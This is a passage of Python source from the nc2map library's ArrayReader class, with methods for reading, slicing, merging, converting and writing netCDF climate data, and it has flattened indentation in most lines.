self.latnames = latnames
self.udims = udims
self.ufuncs = ufuncs
self.meta = OrderedDict(meta).copy()
self.logger.debug("Dimension names:")
for attr in ['timenames', 'levelnames', 'lonnames', 'latnames',
'udims']:
self.logger.debug(" %s: %s", attr, locals()[attr])
self.variables = OrderedDict()
        for var, var_dict in data.items():
            self.variables[var] = Variable(
                var_dict['data'], var, var_dict['dims'],
                meta=var_dict.get('meta', {}))
self.logger.debug("Dimensions found:")
for attr in ['timenames', 'levelnames', 'lonnames', 'latnames']:
self.logger.debug(
" %s as %s dimension.", getattr(self, attr),
attr.replace('names', ''))
def get_coords(self, varo):
"""Return the coordinates as a dictionary corresponding to a variable
Parameters
----------
varo: object
:class:`~nc2map.readers.Variable` or netCDF4.Variable instance
Returns
-------
dict: dictionary with keys being coordinate names, and values the
variable"""
if not self._udim(varo):
return {key: val for key, val in self.grid_variables.items()
if key in _get_dims(varo)}
else:
for ini in self.ufuncs:
self.logger.debug(" Try %s", ini.__class__.__name__)
try:
coords = ini.get_coords(self, varo)
for dim in set(
_get_dims(varo)).intersection(self.variables):
coords[dim] = self.variables[dim]
return coords
except GridError:
self.logger.debug(" Failed.", exc_info=True)
        raise GridError(
            "No class could interpret the unstructured grid!")
def convert_time(self, times, tname=None):
"""Converts the time variable instance into array of datetime
instances.
Supports relative (e.g. days since 1989-6-15 12:00) and absolute time
units (day as %Y%m%d.%f)"""
if isinstance(times[0], dt.datetime):
return times[:]
meta = self.get_meta(tname or times.name)
try:
units = meta['units']
except KeyError:
raise ValueError("Could not determine units of time variable")
try:
calendar = meta['calendar']
except KeyError:
warn("Could not determine calendar. Hence I assume the 'standard' "
"calendar.", Nc2MapRuntimeWarning)
calendar = 'standard'
try: # try interpretation of relative time units
self.logger.debug("Try netCDF4.num2date function")
dts = nc.num2date(times[:], units=units, calendar=calendar)
except ValueError: # assume absolute time units
self.logger.debug("Failed. Test for absolute time...", exc_info=1)
            if not units == 'day as %Y%m%d.%f':
                raise ValueError("Could not interpret time units %r" %
                                 units)
days = np.floor(times[:]).astype(int)
subdays = np.asarray(times[:] - days)
days = np.asarray(map(lambda x: "%08i" % x, days))
dts = np.array(
map(lambda x: (dt.datetime.strptime(x[0], "%Y%m%d") +
dt.timedelta(days=x[1])),
zip(days, subdays)))
return np.array(map(np.datetime64, dts))
def get_triangles(self, varo, convert_spatial,
min_circle_ratio=defaults['min_circle_ratio']):
"""Method to get the unstructered grid
Parameters
----------
varo: object
variable object containing the data (only used for compatibility)
convert_spatial: bool, optional
Default: True. If this is True, and the spatial dimensions
(latitudes, longitudes) are in radians, they are converted to
degrees
        min_circle_ratio: float, optional
            Minimal circle ratio. If not 0, the
            matplotlib.tri.TriAnalyzer.get_flat_tri_mask method is used to
            mask very flat triangles. Defaults to
            :attr:`nc2map.defaults.readers`['min_circle_ratio']
Returns
-------
lon: 1D-array of longitudes
lat: 1D-array of latitudes
triang: matplotlib.tri.Triangulation instance with the triangle
definitions
See Also
--------
        ufuncs: List of classes that are used for the interpretation of
            unstructured grids, each standing for a different convention.
Notes
-----
This method is used by the
:meth:`~nc2map.readers.ReaderBase.get_data` method."""
self.logger.debug("Interprete unstructered grid...")
for ini in self.ufuncs:
self.logger.debug(" Try %s", ini.__class__.__name__)
try:
lon, lat, triang = ini.get_triangles(self, varo,
convert_spatial)
if min_circle_ratio:
tria = TriAnalyzer(triang)
triang.set_mask(
tria.get_flat_tri_mask(min_circle_ratio))
return lon, lat, triang
except GridError:
self.logger.debug(" Failed.", exc_info=True)
        raise GridError(
            "No class could interpret the unstructured grid!")
def convert_spatial(self, varo, units=None, raise_error=True, vname=None):
"""Converts radians to degrees
Parameters
----------
varo: object
A variable object (e.g. nc2map.readers.Variable or
netCDF4.Variable)
raise_error: bool
Raise an error if `varo` does not have a units attribute
Returns
-------
arr: dimension data in degrees
Raises
------
ValueError
If `varo` does not have a units attribute and `raise_error`
Note
----
This method only calculates if varo.units == 'radian'"""
self.logger.debug("Converting spatial dimension %s" % varo)
try:
self.get_meta(vname or varo.name)['units']
except KeyError:
if units is None:
raise ValueError(
"Could not determine units of the spatial variable")
if units == 'radian':
self.logger.debug(" Found radians")
out = varo[:] * 180./np.pi
else:
self.logger.debug(" No radians")
out = varo[:]
return out
def set_logger(self, name=None, force=False):
"""This function sets the logging.Logger instance in the MapsManager
instance.
Input:
- name: name of the Logger (if None: it will be named like
<module name>.<class name>)
- force: True/False (Default: False). If False, do not set it if the
instance has already a logger attribute."""
if name is None:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
if force or not hasattr(self, 'logger'):
self.logger = logging.getLogger(name)
self.logger.debug('Initializing...')
def _udim(self, var):
"""Test if the variable is unstructured"""
udim = self.udims.intersection(_get_dims(var))
udim = None if not udim else list(udim)[0]
return udim
def get_time_slice(self, index):
"""Gets the time slice by using the numpy.datetime64 class and
returns the index using the numpy.searchsorted function
Input:
- Index: list or list of objects suitable for the np.datetime64
routine. Possibilities are
            -- Integer or slice (then nothing happens and they are
                returned)
-- datetime.datetime instances
-- numpy.datetime64 instances
-- isoformat ('YYYY-mm-ddTHH:MM:SS') strings or part of them
(e.g. '2005' will be interpreted as year 2005, '2005-03'
will be interpreted as March, 2005)
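        Example (a sketch; assumes a reader covering the year 2005):
        >>> reader.get_time_slice(slice(0, 12))  # passed through unchanged
        slice(0, 12, None)
        >>> i = reader.get_time_slice('2005-03')  # index of March 2005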
"""
if isinstance(index, (int, slice)):
return index
try:
if isinstance(index[0], (int, slice)):
if any(not isinstance(idx, (int, slice)) for idx in index):
raise ValueError(
"Some but not all values are integers or slices!")
return index
except (TypeError, IndexError):
pass
if self.dttime is None:
raise ValueError(
"Could not find (or interpret) time variable in Reader!")
times = self.dttime
try: # try isoformat
t = np.datetime64(index).astype(times.dtype)
except ValueError:
try:
t = np.array(map(np.datetime64, index)).astype(times.dtype)
except TypeError:
raise ValueError("Could not interpret time information!")
return times.searchsorted(t)
def merge(self, *args, **kwargs):
"""Merge multiple readers into one.
Arguments may be instances of the ArrayReader class
Keyword arguments may be
- copy: True/False (Default: False). If True, the data is copied.
- close: True/False (Default: False). If True, the old reader
instances are closed
Please note:
1.) All readers must have the same grid
        2.) Only one of the following can be fulfilled
a.) Each has different variables
b.) Each has different time steps
c.) Each has different levels
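        Example (a sketch; ``reader_a`` and ``reader_b`` are hypothetical
        readers on the same grid holding different variables):
        >>> merged = reader_a.merge(reader_b, copy=True)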
"""
def check_dims(*readers):
"""Checks whether the reader dimensions match to this one and
prints warnings and raises errors
Input:
              - readers: ArrayReader instances
Output:
- dictionary with matches"""
# ---- check grid sizes ----
readers = list(readers) + [self]
lon_reader = [reader for reader in readers if reader.lon]
if lon_reader:
lon_reader = lon_reader[0]
for reader in readers:
if reader == lon_reader or not reader.lon:
continue
if len(lon_reader.lon) == len(reader.lon):
# raise warning if lens match anyway
if np.any(lon_reader.lon[:] != reader.lon[:]):
critical(
"Attention! Only size of longitudinal grid of"
" %s matches!" % type(reader))
else:
raise ValueError(
"Longitudes of %s do not match!" % (
type(reader)))
lat_reader = [reader for reader in readers if reader.lat]
if lat_reader:
lat_reader = lat_reader[0]
for reader in readers:
if reader == lat_reader or not reader.lat:
continue
if len(lat_reader.lat) == len(reader.lat):
if np.any(lat_reader.lat[:] != reader.lat[:]):
# raise warning if lens match anyway
critical(
"Attention! Only size of latitudinal grid of "
"%s matches!" % type(reader))
else:
raise ValueError(
"Latitudes of %s do not match!" % (
type(reader)))
checks = {}
variables = [
set(reader.variables.keys()) -
set(reader.grid_variables.keys())
for reader in readers]
all_times = [set(reader.dttime) for reader in readers
if reader.time is not None]
all_levels = [set(reader.level[:]) for reader in readers
if reader.level is not None]
for key, base_dims in [('variables', variables),
('times', all_times),
('levels', all_levels)]:
self.logger.debug("Check if %s match...", key)
if not base_dims:
continue
for i, dims in enumerate(base_dims):
for j, dims2 in enumerate(base_dims):
if i == j:
continue
if dims.isdisjoint(dims2):
self.logger.debug(
"Reader %i does not match reader %i", i, j)
checks[key] = False
else:
checks[key] = True
break
return checks, readers
self.logger.debug("Start merging readers...")
self.logger.debug("Input:")
for i, reader in enumerate([self] + list(args)):
self.logger.debug("--------- Reader %i ---------", i)
self.logger.debug("%s", reader)
copy = kwargs.get('copy', False)
close = kwargs.get('close', False)
checks, readers = check_dims(*args)
false_checks = len([check for check in checks.values() if not check])
if false_checks != 1:
            if not false_checks:
                raise ValueError(
                    "Don't know how to merge the readers! They must have "
                    "either all different variables, times or levels!")
raise ValueError(
"I can either merge different variables, different times or "
"different levels, but not different %s simultaneously!" % (
' and '.join(
key for key, val in checks.items() if not val)))
data = {}
if not checks['variables']:
for reader in readers:
for var, obj in reader.variables.items():
if copy:
data[var] = {
'data': obj[:].copy(), 'dims': _get_dims(obj)[:],
'meta': reader.get_meta(var=var).copy()}
else:
data[var] = {
'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': reader.get_meta(var=var)}
elif not checks['times']:
stime = self.timenames
for var, obj in self.variables.items():
data[var] = {
'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
            for reader in readers[:-1]:
                indices = np.searchsorted(self.dttime, reader.dttime,
                                          sorter=np.argsort(self.dttime))
                # insert the data of the other reader (not of self) at the
                # matching time steps
                for var, obj in reader.variables.items():
                    if stime not in _get_dims(obj):
                        continue
                    data[var]['data'] = np.insert(
                        data[var]['data'], indices, obj[:],
                        axis=list(_get_dims(obj)).index(reader.timenames))
elif not checks['levels']:
slevel = self.levelnames
for var, obj in self.variables.items():
data[var] = {
'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
            for reader in readers[:-1]:
                # if levels are reversed --> reverse indices
                if self.level[-1] < self.level[0]:
                    indices = np.searchsorted(self.level[:],
                                              reader.level[:],
                                              side='right',
                                              sorter=np.argsort(
                                                  self.level[:]))
                    indices = len(self.level) - indices
                else:
                    indices = np.searchsorted(self.level[:],
                                              reader.level[:])
                # insert the data of the other reader (not of self) at the
                # matching levels
                for var, obj in reader.variables.items():
                    if slevel not in _get_dims(obj):
                        continue
                    data[var]['data'] = np.insert(
                        data[var]['data'], indices, obj[:],
                        axis=list(_get_dims(obj)).index(reader.levelnames))
return ArrayReader(
meta=self.get_meta().copy(),
timenames=self._timenames, levelnames=self._levelnames,
lonnames=self._lonnames, latnames=self._latnames, **data)
def dump_nc(self, output, clobber=False, compression={}, close=True,
missval=None, **kwargs):
"""Method to create netCDF file out the data in the ArrayReader
Input:
- output: String. Name of the resulting NetCDF file
- clobber: Enable clobber (will significantly reduce file size).
Input must be 'auto' or a list of the chunking parameters (the
first one corresponds to time, the others to the dimension as
stored in the netCDF file (usually the second corresponds to
lat, the third to lon).
If 'auto' chunking parameters are deterimined such that 1D and
2D access are balanced. The calculation function is taken from
http://www.unidata.ucar.edu/staff/russ/public/chunk_shape_3D.py
- Dictionary with compression parameters for netCDF4 variable
(determined by netCDF4 package. Possible keywords are zlib,
complevel, shuffle and least_significant_digit. For documentation
see
http://netcdf4-python.googlecode.com/svn/trunk/docs/netCDF4.Variable-class.html
If compression is not a dictionary, the value will be used for
the complevel keyword in netCDF4 variables.
- close: True/False. If True, the NetCDF handler will be closed at
the end
- missval: Missing Value. If None, it will be looked for a
_FillValue attribute in the reader or the FillValue of the
masked numpy array will be used.
Returns:
- nco. netCDF4.Dataset file handler of output
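        Example (a sketch; the file name is only illustrative):
        >>> nco = reader.dump_nc('out.nc',
        ...                      compression={'zlib': True, 'complevel': 4},
        ...                      close=False)
        >>> nco.close()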
"""
# docstring is extended below
# set chunking parameter
if os.path.exists(output):
os.remove(output)
self.logger.debug("Creating NetCDF file %s with..." % output)
self.logger.debug(" clobber: %s", clobber)
for item in kwargs.items():
self.logger.debug(" %s: %s", *item)
if clobber is not False:
if clobber == 'auto':
clobber = chunk_shape_3D(
[self.ntimes] + list(
self.lola_variables.values()[0].shape))
nco = NCReader(output, 'w', clobber=True, **kwargs)
else:
nco = NCReader(output, 'w', **kwargs)
if not isinstance(compression, dict):
compression = {'zlib': True, 'complevel': compression}
nco.setncatts(self.get_meta())
created_dims = set()
for var, obj in self.variables.items():
self.logger.debug("Creating variable %s" % var)
if missval is None:
try:
fill_value = obj._FillValue
except AttributeError:
try:
fill_value = obj[:].fill_value
except AttributeError:
fill_value = None
else:
fill_value = missval
for i, dim in enumerate(_get_dims(obj)):
if dim not in created_dims:
if dim == self.timenames:
nco.createDimension(dim, None)
else:
nco.createDimension(dim, obj.shape[i])
created_dims.add(dim)
if clobber is not False:
varno = nco.createVariable(
var, obj[:].dtype, _get_dims(obj),
chunksizes=clobber, fill_value=fill_value, **compression
)
else:
varno = nco.createVariable(
var, obj[:].dtype, _get_dims(obj),
fill_value=fill_value, **compression
)
varno.setncatts(self.get_meta(var=var))
varno[:] = obj[:]
if close:
nco.close()
return nco
def get_data(self, var=None, vlst=None, datashape='2D', convert_time=True,
rename_dims=True, convert_spatial=True, **dims):
"""Extract data out of the ArrayReader instance
Please note that either var or vlst must be None
Input:
- var: string. Variable name to extract
- vlst: List of strings. Variable names to extract. If this is not
            None, the first dimension of the Data output will be set up as
vlst
- datashape: string ('1d', '2d', '3d', '4d' or 'any'). Data shape
which shall be returned.
            -- If 1d, output will be a one-dimensional array. Unlike with
               '2d', '3d' and '4d', you must give all dimensions
               explicitly; there are no default values
-- If 2d, output will be a two-dimensional array
               with latitude and longitude dimension (if time and level
               are not given, the according slices are 0)
-- If 3d, output will be a three-dimensional array with time,
               latitude and longitude dimension (if the level dimension is
               not given, the according slice will be 0)
-- If 4d: output will be a four-dimensional array with time,
level, latitude and longitude dimension.
-- If any: dimensions will be unchanged and the full
slice is returned for dimensions not specified in **dims
In the case of 2d, 3d or 4d, an error is raised if a dimension
is found which is not in self.timenames, self.levelnames,
self.lonnames or self.latnames and not specified by **dims
- convert_time: Boolean (Default: True). If this is true, the time
            information is converted to datetime.datetime instances
- convert_spatial: Boolean (Default: True). If this is True, and the
spatial dimensions (latitudes, longitudes) are in radians, they
are converted to degrees
Further Keyword arguments (**dims) may be of
<dimension name>=<dimension slice>, where <dimension name> is the
name of the dimension as stored in the variable instance and
<dimension slice> the slice (or integer) which shall be extracted.
            If the dimension furthermore is a time dimension, the index
            can be given in a numpy.datetime64 compatible style (e.g.
            '2005-03', see the get_time_slice method)
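        Example (a sketch; variable and dimension names are illustrative):
        >>> field = reader.get_data(var='t2m', datashape='2d',
        ...                         time='2005-03', level=0)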
"""
def extract_data(var, dimslices):
self.logger.debug("Extract %s", var)
# read data
self.logger.debug("Extract data with slice %s", dimslices)
data = self.variables[var].__getitem__(tuple(dimslices))
if not isinstance(data, np.ma.MaskedArray):
self.logger.debug("Convert %s to masked array", type(data))
data = np.ma.masked_array(
data, mask=np.ma.make_mask(np.zeros(shape=np.shape(data)),
shrink=False), copy=True)
# set up grid information for DataField instance
vardims = list(_get_dims(self.variables[var]))
# check whether data has the right shape
            if udim:  # unstructured grids have only one spatial dimension
shapelens = {'1d': 1, '2d': 1, '3d': 2, '4d': 3}
else:
shapelens = {'1d': 1, '2d': 2, '3d': 3, '4d': 4}
for shapelen, val in shapelens.items():
if datashape == shapelen and len(data.shape) != val:
raise ValueError((
"Wrong dimension length! Expected %i dimensions but "
"found %i in %s. Set datashape to 'any' to return "
"all.") % (val, len(data.shape), vardims))
# remove integer slices
for key, val in dims.items():
if isinstance(val, int) and key in vardims:
self.logger.debug(
"Remove dimension %s from dimension list because "
"integer slice.", key)
vardims.remove(key)
return data, vardims
self.logger.debug("Getting data with var %s and vlst %s", var, vlst)
# set up dimension order to read from the netCDF
if var is not None and var not in self.variables.keys():
raise KeyError(
'Unknown variable %s! Possible variables are %s' % (
var, self.variables.keys()))
if vlst is not None and any(
var not in self.variables.keys() for var in vlst):
missing_vars = ', '.join(
str(var) for var in vlst if var not in self.variables.keys())
raise KeyError(
'Unknown variables %s! Possible variables are %s' % (
missing_vars, self.variables.keys()))
if var is not None and vlst is not None:
raise ValueError(
"Either var or vlst keyword must be None!")
if var is None and vlst is None:
raise ValueError("Either var or vlst must not be None!")
single_var = True if var is not None else False
multiple_vars = True if np.all(vlst is not None) else False
self.logger.debug("Desired datashape: %s", datashape)
for key, val in dims.items():
self.logger.debug("Slice for dimension %s: %s", key, val)
if var is not None:
dimslices = list(_get_dims(self.variables[var]))
elif np.all(vlst is not None):
var = vlst[0]
dimslices = list(_get_dims(self.variables[var]))
else:
dimslices = [self.timenames, self.levelnames, self.lonnames,
self.latnames]
self.logger.debug("Dimensions in variable instance: %s",
', '.join(dimslices))
default_slices = {}
datashape_slices = {
'2d': {'time': 0, 'level': 0},
'3d': {'time': slice(None), 'level': 0}}
for dshape in ['1d', '4d', 'any']:
datashape_slices[dshape] = {
'time': slice(None), 'level': slice(None)}
for val in datashape_slices.values():
val['lon'] = slice(None)
val['lat'] = slice(None)
datashape = datashape.lower()
        if datashape not in datashape_slices:
            raise ValueError(
                "Wrong datashape %s! Possible values are %s" % (
                    datashape, ', '.join(datashape_slices)))
varo = self.variables[var]
udim = self._udim(varo)
for i, dim in enumerate(dimslices):
try:
self.logger.debug(
"Try to get slice for dimension %s from user settings",
dim)
if dim == self.timenames:
dimslices[i] = self.get_time_slice(dims[dim])
dims[dim] = dimslices[i]
else:
dimslices[i] = dims[dim]
except KeyError:
self.logger.debug("Failed.")
# if dimension has length 1: take first entry
                for sdim in ['lon', 'lat', 'time', 'level']:
                    failed = True
                    possible_names = getattr(self, '_'+sdim+'names')
                    if dim in possible_names:
                        # look for a user-specified alias of the dimension
                        # and fall back to the default slice of the
                        # datashape
                        for d in possible_names:
                            if d in dims:
                                dims[dim] = dims.pop(d)
                                dimslice = dims[dim]
                                break
                        else:
                            dimslice = datashape_slices[datashape][sdim]
                        self.logger.debug(
                            "Found dimension %s in standard names for %s "
                            "--> use slice %s", dim, sdim, dimslice)
                        if varo.shape[i] == 1 and datashape == '1d':
                            dimslices[i] = 0
                        else:
                            dimslices[i] = dimslice
                        dims[dim] = dimslices[i]
                        failed = False
                        break
if failed and varo.shape[i] == 1:
self.logger.debug(
"Dimension %s was not specified but has length 1 --> "
"use first step" % dim)
if datashape == 'any':
dimslices[i] = slice(None)
dims[dim] = slice(None)
else:
dimslices[i] = 0
dims[dim] = 0
elif failed and dim == udim:
dimslices[i] = slice(None)
dims[dim] = slice(None)
elif failed and datashape in ['1d', 'any']:
if dim != udim:
warn("Dimension %s was not specified, therefore I "
"return all of that dimension" % dimslices[i])
dimslices[i] = slice(None)
dims[dim] = slice(None)
elif failed:
self.logger.info(
"Use the first step for dimension %s. ", dim)
dimslices[i] = 0
dims[dim] = 0
unused_dimensions = [dim for dim in dims if not dim in _get_dims(varo)]
if unused_dimensions:
if set(unused_dimensions) - {'time', 'level'}:
warn("Did not use slice for dimension %s because not in "
"dimension list of variable %s!" % (
', '.join(unused_dimensions), _get_dims(varo)))
else:
self.logger.debug(
"Did not use slice for dimension %s because not in "
"dimension list of variable %s!",
', '.join(unused_dimensions), _get_dims(varo))
#for dim in unused_dimensions:
#del dims[dim]
datakwargs = {}
standard_names = {'lon': self._lonnames, 'lat': self._latnames,
'time': self._timenames, 'level': self._levelnames}
for dim, dimslice in dims.items():
self.logger.debug("Try to get data for dimension %s", dim)
try:
dim_data = self.variables[dim]
except KeyError:
exist = False
for key, val in standard_names.items():
if dim in val:
try:
dim_data = self.variables[
getattr(self, key+'names')]
exist = True
break
except KeyError:
pass
if not exist and dim != udim:
warn("Did not find data for dimension %s in the reader" % (
dim))
if not exist:
continue
if dim in self._timenames and convert_time:
try:
dim_data = self.convert_time(dim_data, dim)
except ValueError as e:
warn(e.message, logger=self.logger)
elif (dim in self._lonnames.union(self._latnames)
and convert_spatial):
dim_data = self.convert_spatial(dim_data, raise_error=False,
vname=dim)
datakwargs[dim] = dim_data[dimslice]
# consider unstructured data
if udim:
lon, lat, triangles = self.get_triangles(varo, convert_spatial)
if self._lonnames.isdisjoint(datakwargs):
datakwargs[self.lonnames or 'lon'] = lon
if self._latnames.isdisjoint(datakwargs):
datakwargs[self.latnames or 'lat'] = lat
datakwargs['triangles'] = triangles
# add unstructured dimension to datakwargs
if self.udims.isdisjoint(datakwargs):
iax = list(_get_dims(varo)).index(udim)
datakwargs[udim] = np.array(range(varo.shape[iax]))
if single_var:
varname = var
data, vardims = extract_data(var, dimslices)
dims['var'] = var
elif multiple_vars:
varname = '-'.join(vlst)
data0, vardims = extract_data(vlst[0], dimslices)
data = np.ma.zeros([len(vlst)] + list(np.shape(data0)))
data[0, :] = data0
del data0
for i, var in enumerate(vlst[1:]):
data0, vardims0 = extract_data(var, dimslices)
if not np.all(vardims == vardims0):
raise ValueError(
"Dimensions do not match! Found dimensions %s for "
"variable %s and dimensions %s for variable %s." % (
vardims, vlst[0], vardims0, var))
data[i+1, :] = data0
vardims.insert(0, varname)
            # avoid a warning from the DataField.check_dims method
datakwargs[varname] = range(len(vlst))
dims['vlst'] = vlst
# get spatial axis
if udim:
spatial_ax = [list(vardims).index(udim)]
else:
spatial_ax = [i for i, dim in enumerate(vardims)
if dim in self._lonnames.union(self._latnames)]
# rename dimensions lon, lat, time and level
if rename_dims:
for i, dim in enumerate(vardims):
for key, val in standard_names.items():
if dim in val:
vardims[i] = key
for dim in datakwargs:
for key, val in standard_names.items():
if dim in val.intersection(datakwargs):
datakwargs[key] = datakwargs.pop(dim)
kwargs = {}
else:
non_standard_names = {'lon': self.lonnames, 'lat': self.latnames,
'time': self.timenames,
'level': self.levelnames}
for key in datakwargs:
if key in non_standard_names:
datakwargs[non_standard_names[key]] = datakwargs.pop(key)
kwargs = {'lon': self.lonnames, 'lat': self.latnames,
'time': self.timenames, 'level': self.levelnames}
if datashape in ['any', '1d']:
return DataField(data, var=varname, dimensions=vardims,
dims=datakwargs, spatial_ax=spatial_ax,
triangles=datakwargs.pop('triangles', None),
**kwargs)
else:
# set up dimensions according to the conventions used in nc2map
spatial = [udim] if udim else ['lat', 'lon']
if single_var:
conventions = {'2d': spatial,
'3d': ['time'] + spatial,
'4d': ['time', 'level'] + spatial}
elif multiple_vars:
conventions = {'2d': [varname] + spatial,
'3d': [varname, 'time'] + spatial,
'4d': [varname, 'time', 'level'] + spatial}
vardims = [dim for dim in vardims if dim in conventions[datashape]]
            for dim in list(vardims):  # iterate over a copy while reordering
if vardims.index(dim) != conventions[datashape].index(dim):
data = np.rollaxis(data, vardims.index(dim),
conventions[datashape].index(dim))
vardims.remove(dim)
vardims.insert(conventions[datashape].index(dim), dim)
return DataField(data, var=varname, dims=datakwargs,
dimensions=conventions[datashape],
spatial_ax=spatial_ax,
triangles=datakwargs.pop('triangles', None),
**kwargs)
def gen_data(self, var, datashape='2d', **dims):
"""This method returns a data generator for a 2-dimensional data slice
for the given dimensions dims.
        Any dimension given as a one-dimensional iterable object (list,
        numpy.array) specifies the dimension over which to loop. In this
        case a generator of 2-dimensional data slices is returned.
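        Example (a sketch; loops over the first twelve time steps):
        >>> for field in reader.gen_data('t2m', time=range(12), level=0):
        ...     ts = field.fldmean()
        """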
iterable_dims = []
for key, val in dims.items():
try:
iter(val)
iterable_dims.append(key)
except TypeError:
pass
        if len(iterable_dims) == 0:
            warn('Did not find any iterable dimension!')
        elif len(iterable_dims) > 1:
            raise ValueError('Found multiple iterable dimensions!')
        iterable_dim = iterable_dims[0]
        it_vals = iter(dims[iterable_dim])
        while True:
            try:
                dims[iterable_dim] = next(it_vals)
            except StopIteration:  # the iterable dimension is exhausted
                return
            yield self.get_data(var=var, datashape=datashape, **dims)
def set_meta(self, var=None, **meta):
"""Set meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information
        Keyword arguments (meta) describe the key, value pairs for the
        meta information"""
if var is not None and var not in self.variables.keys():
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
else:
obj = self.variables[var]
obj.meta.update(meta)
def get_meta(self, var=None):
"""Get meta information.
Input:
- var: string. Variable name. If None, the meta information is
regarded as global meta information"""
possible_keys = self.variables.keys() + list(self._timenames) + list(
self._levelnames) + list(self._lonnames) + list(self._latnames)
if var is not None and var not in possible_keys:
raise KeyError('Unknown variable %s' % var)
if var is None:
obj = self
elif var in self._lonnames:
obj = self.lon
elif var in self._latnames:
obj = self.lat
elif var in self._timenames:
obj = self.time
elif var in self._levelnames:
obj = self.level
else:
obj = self.variables[var]
return obj.meta
def copy(self):
"""Returns an ArrayReader instance with the same attributes as this
ArrayReader instance"""
data = {}
for var, obj in self.variables.items():
data[var] = {'data': obj[:].copy(), 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
reader = ArrayReader(
meta=self.get_meta().copy(),
timenames=self._timenames, levelnames=self._levelnames,
lonnames=self._lonnames, latnames=self._latnames, **data)
try:
reader._grid_file = self._grid_file
except AttributeError:
pass
return reader
def close(self):
"""Closes the ArrayReader instance and deletes the stored variables"""
        for variable in list(self.variables):
            try:
                del self.variables[variable].data
            except AttributeError:
                pass
            del self.variables[variable]
def selname(self, *args, **kwargs):
"""Method to return an ArrayReader instance with only the grid
variables
Keyword arguments may be
- copy: Boolean. (Default: False). If True, the data will sign to
the same array as before. Otherwise everything will be copied."""
copy = kwargs.get('copy')
data = {}
var_items = [
item for item in self.variables.items() if item[0] in args]
dimensions = set(chain(*[self.get_coords(obj)
for var, obj in var_items]))
dim_items = [
item for item in self.variables.items() if item[0] in dimensions]
for var, obj in var_items + dim_items:
if copy:
data[var] = {'data': obj[:].copy(), 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var).copy()}
else:
data[var] = {'data': obj[:], 'dims': _get_dims(obj)[:],
'meta': self.get_meta(var=var)}
if copy:
meta = self.get_meta().copy()
else:
meta = self.get_meta()
return ArrayReader(
meta=meta,
timenames=self._timenames, levelnames=self._levelnames,
lonnames=self._lonnames, latnames=self._latnames, **data)
def expand_dims(self, var=None, vlst=None, default=0, **dims):
"""Expands the dimensions to match the dimensions in the reader
variable"""
# dimensions in the variable (without longitude and latitude)
if var is None:
dims['vlst'] = vlst
var = self.variables[vlst[0]]
else:
dims['var'] = var
var = self.variables[var]
vdims = set(_get_dims(var)) - self._latnames - self._lonnames \
- self.udims
        ndims = len(set(dims) & (self._levelnames | self._timenames) &
                    set(_get_dims(var)))
if ndims == len(vdims):
return dims
# standard names from reader._levelnames, etc.
levelnames = self._levelnames
timenames = self._timenames
vdims -= set(dims) # remove dims that match already
if not levelnames.isdisjoint(dims):
vdims -= levelnames
if not timenames.isdisjoint(dims):
vdims -= timenames
for dim in vdims:
if (dim == self.levelnames and 'level' in levelnames):
dim = 'level'
elif (dim == self.timenames and 'time' in timenames):
dim = 'time'
self.logger.info("Use %s for dimension %s. ", default, dim)
dims[dim] = default
return dims
def extract(self, var=None, vlst=None, **kwargs):
"""Method to extract the data variable specified by **dims and returns
an ArrayReader instance with only this data plus the grid
informations. This method will return a new copy of the ArrayReader
instance
Keyword arguments (kwargs) are determined by the get_data method, where
datashape is by default set to 'any' and convert_time to False.
"""
kwargs.setdefault('datashape', 'any')
kwargs.setdefault('convert_time', False)
for key, val in kwargs.items():
if isinstance(val, int) and key not in [
'datashape', 'convert_time']:
kwargs[key] = slice(val, val+1)
elif key in self._timenames:
val = self.get_time_slice(val)
if isinstance(val, int):
kwargs[key] = slice(val, val+1)
else:
kwargs[key] = val
if var is not None:
vlst = [var]
full_vlst = set(vlst + list(chain(*(
_get_dims(self.variables[var]) for var in vlst)))).intersection(
set(self.variables.keys()))
reader = self.selname(*full_vlst, copy=True)
data = reader.get_data(rename_dims=False, var=var,
vlst=vlst if var is None else None, **kwargs)
for dim in data.dims.dtype.fields:
try:
reader.variables[dim].data = data.dims[dim].copy()
except KeyError:
pass
if var is not None:
reader.variables[var].data = data[:].copy()
reader.variables[var].dimensions = data.dimensions[:]
else:
for i, var in enumerate(vlst):
reader.variables[var].data = data[i, :].copy()
reader.variables[var].dimensions = data.dimensions[1:]
return reader
def _arithmetics(self, value, func):
"""Basic function performing arithmetics with readers. Value may be a
another ArrayReader instance, func is the function that defines the
arithmetics method (e.g. lambda x, y: x + y)
        This method is called by __iadd__, __imul__, etc."""
def check_reader(reader):
"""Checks whether the reader dimensions and variables match to this
one and prints warnings and raises errors
Input:
- reader: ArrayReader instance
Output:
- dictionary with matches"""
            checks = self._check_variables(reader)
            if checks['base']:
                checks.update(checks['base']._check_dims(checks['new']))
            return checks
try: # try first simply to add the value or array to each variable
for var in set(self.variables) - set(self.grid_variables):
obj = self.variables[var]
try: # try __getitem__ (in case of array)
func(obj, slice(None), value[:])
except TypeError: # try float
func(obj, slice(None), value)
base = self
except TypeError: # now assume a reader instance
checks = check_reader(value)
if not checks['base']:
return self
dims = ['level', 'time']
base = checks['base']
new = checks['new']
if all(checks[dim] for dim in dims):
for base_var, new_var in izip(checks['base_vars'],
checks['new_vars']):
func(base.variables[base_var], slice(None),
new.variables[new_var][:])
else:
for base_var, new_var in izip(checks['base_vars'],
checks['new_vars']):
dimslices = ['base_', 'new_']
dims_gen = product(
izip(checks['base_time'], checks['new_time']),
izip(checks['base_level'], checks['new_level']))
for times, levels in dims_gen:
for i, var in enumerate([base.variables[base_var],
new.variables[new_var]]):
obj = base if not i else new
vardims = np.array(_get_dims(var))
dimslices[i] = list(_get_dims(var))
for j, dim in enumerate(dimslices[i]):
if dim == obj.timenames:
dimslices[i][j] = times[i]
elif dim == obj.levelnames:
dimslices[i][j] = levels[i]
else:
dimslices[i][j] = slice(None)
func(
base.variables[base_var], tuple(dimslices[0]),
new.variables[new_var].__getitem__(tuple(
dimslices[1])))
return base
def _check_dims(self, reader):
"""Checks whether the reader dimensions match to this one and
prints warnings and raises errors
Method is used by _arithmetics to determine how to perform
arithmetics between readers
Input:
